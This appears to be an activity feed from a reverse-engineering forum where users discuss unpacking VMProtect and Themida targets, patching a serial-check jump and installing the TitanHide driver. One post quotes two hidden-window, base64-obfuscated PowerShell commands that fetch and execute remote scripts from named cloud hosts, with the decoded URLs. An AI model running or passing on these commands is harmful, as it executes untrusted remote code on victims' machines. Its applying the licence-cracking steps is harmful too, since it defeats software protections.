All Activity

check pm

I have question how to create that shfolder.dll u created it by yourself or how the process is going can any one answer me please

@Teddy Rogers I should search in my archive , let me some times

titanhide new update coming 3 weeks ago but i am not found titanhide.sys file and am try compile but not working , help me plz (this steps am try but many thing error ) Installation Method 1 Copy TitanHide.sys to %systemroot%\system32\drivers. Run the command sc create TitanHide binPath= %systemroot%\system32\drivers\TitanHide.sys type= kernel to create the TitanHide service. Run the command sc start TitanHide to start the TitanHide service. Run the command sc query TitanHide to check if TitanHide is running. Installation Method 2 Copy TitanHide.sys to %systemroot%\system32\drivers. Start ServiceManager.exe (available on the download page). Delete the old service (when present). Install a new service (specify the full path to TitanHide.sys). Start the service you just created. Use TitanHideGUI.exe to set hide options for a PID.

@HostageOfCode Do you mean that it does not run in your system? It runs in my system after dumping. but the addressofentrypoint is invalid? And after rebooting my pc, it does not run. Regards. sean.

Your iat is not solved correctly. Put bp on GetProcAddress and log all the apis. Tried to make it run with the virtualized functions but without success so far. It uses IsProcessorFeaturePresent and other tricks to detect unpack.

I recommand the people to use this protection because it's very good. The protection is advanced like Pelock but very good. Only a real reserver can do it But it needs much times to be able handle it.

@14yoKID hey, man. can you send me the log? Regards. sean.

@New Year - New Mind Hey New Year! You will have to trace it through VM,i used CE and basically logged all of the things from start to end,im pretty sure i saved CE log on pc,if not ill see to do it again and send it to you so you can observe the things i did.

@14yoKID How to find the conditional jump after the VMProtectSetSerialNumber function? Regards. sean.

@Gladiator would have to reupload unless someone kept a copy... Ted.

Im pretty sure i have patched most of the things successfully. Results : Screen Recording - Made with FlexClip.webm

I assume it depends on the protection settings. Try unpacking this target

This plugin is much more powerful than the original WinLicense. 80-90% of people can’t get around it!

@HostageOfCode How to reduce the size of the dump? My resulting dump is this but not reduced of the size. hashgen_protected_Entry_VMed_dump_SCY.zip Regards. sean.

hi, when i try to download the files it keep showing Failed to get source link what's the issue?

@HostageOfCode You have done it. man. Many thanks. Regards. sean.

Hmm , expected themida to be harder but was not harder even 5% to unpack than vmprotect. hashgen_protected_Entry_VMed__fixed.exe

link1 =>> pOwerSHell -w HIddeN "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vbmV3YnVjazEyLm9zcy1hcC1zb3V0aGVhc3QtNy5hbGl5dW5jcy5jb20vcEpLcmJHU0kudHh0JyAtVXNlQmFzaWNQYXJzaW5nKS5Db250ZW50')) | iex decoded =>>https://newbuck12.oss-ap-southeast-7.aliyuncs.com/pJKrbGSI.txt link2 =>> PoWErsHeLL -W HiddEn "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4IChpd3IgJ2h0dHBzOi8vc2FuZGlzazIub3NzLWFwLW5vcnRoZWFzdC0yLmFsaXl1bmNzLmNvbS9vTGpmZVBqZy50eHQnIC1Vc2VCYXNpY1BhcnNpbmcpLkNvbnRlbnQ=')) | iex decoded =>>https://sandisk2.oss-ap-northeast-2.aliyuncs.com/oLjfePjg.txt

@StarrySky Can you please post a video if you successfully make it run? Regards. sean.

@HostageOfCode Is this option implemented with the vmp license manager that you linked? Regards. sean.

https://forum.tuts4you.com/topic/44928-vmprotect-web-license-manager-v214

@StarrySky Can you make this serial locked one run? I have zipped a wrong serial.txt and protected executable to make a challenge. hashgen.vmp.serial.locked.zip If you edit the first character of the serial.txt file, this executable will run. or you have to find the test and conditinal jump instructions which are virtualized after VMProtectSetSerialNumber function. this function returns 2 which means that the serial is invalid, when it returns 0, this executable will run. And I have a question about how to use a vmprotect feature. I protected a procedure called "OnBnClicked..." with the options above. and when I clicked the button when it runs, its shows this message and is terminated. how to use this option properly? Regards. sean.

@StarrySky How to do it? Regards. sean.